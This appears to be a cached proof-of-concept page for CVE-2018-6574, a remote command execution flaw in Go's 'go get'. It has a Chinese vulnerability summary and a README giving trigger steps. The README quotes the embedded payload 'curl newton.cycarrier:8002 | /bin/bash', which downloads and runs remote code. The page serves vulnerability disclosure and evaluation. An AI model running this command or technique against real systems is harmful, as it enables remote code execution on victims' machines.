CVE-2018-6574 PoC — Google Go 安全漏洞

Source

https://github.com/frozenkp/CVE-2018-6574

Associated Vulnerability

Title:Google Go 安全漏洞 (CVE-2018-6574)
Description:Google Go是美国谷歌（Google）公司的一种针对多处理器系统应用程序的编程进行了优化的编程语言。 Google Go 1.8.7之前版本、1.9.4之前的1.9.x版本和1.10rc2之前的1.10 pre-releases版本中存在安全漏洞。远程攻击者可利用该漏洞执行命令。

Readme

CVE-2018-6574
===

Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow `go get` remote command execution during source code build, by leveraging the gcc or clang plugin feature, because `-fplugin=` and `-plugin=` arguments were not blocked. (from [mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6574))

## RCE command
The command was compiled into the dynamic library `calc_darwin.so`. And the current command is `curl newton.cycarrier:8002 | /bin/bash`. It was used as an intitial access of a program. You have to host a file server on port 8002 and bind the host to your IP.

## How to trigger?
At first, you have to install the required version of golang on the victim. Then, host this repo on a accessable git server. Finally, use `go get` command to gather this repo, and the command will be executed automatically.

Take my repo as example. You have to use the following command:
```
go get github.com/frozenkp/CVE-2018-6574
```

## Warning
This repo is only for evaluation purpose.

File Snapshot


 [4.0K]  /data/pocs/8c243820d1809c4d83b6fca60dd6f64a46a2b380
├── [ 12K]  calc_darwin.so
├── [ 316]  main.go
└── [1.0K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!